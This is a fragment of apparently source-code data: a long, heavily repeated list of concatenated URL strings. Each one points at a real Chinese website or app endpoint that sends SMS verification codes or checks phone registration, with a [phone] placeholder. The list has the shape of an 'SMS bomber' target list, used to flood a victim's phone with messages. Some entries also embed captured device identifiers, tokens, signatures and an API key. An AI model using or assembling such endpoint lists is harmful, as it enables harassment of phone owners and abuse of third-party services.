"https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "https://logic-zone-10007.api.xlgxapp.com/315000/rider/api/v3/message/[phone]?event=OneKeyLogin", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "https://api.julym.com/hz/api.html?number=[phone]", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "https://m.wanghairead.com/api/5b9e03e333e5e?phone=[phone]&send_type=1", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang的 iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + 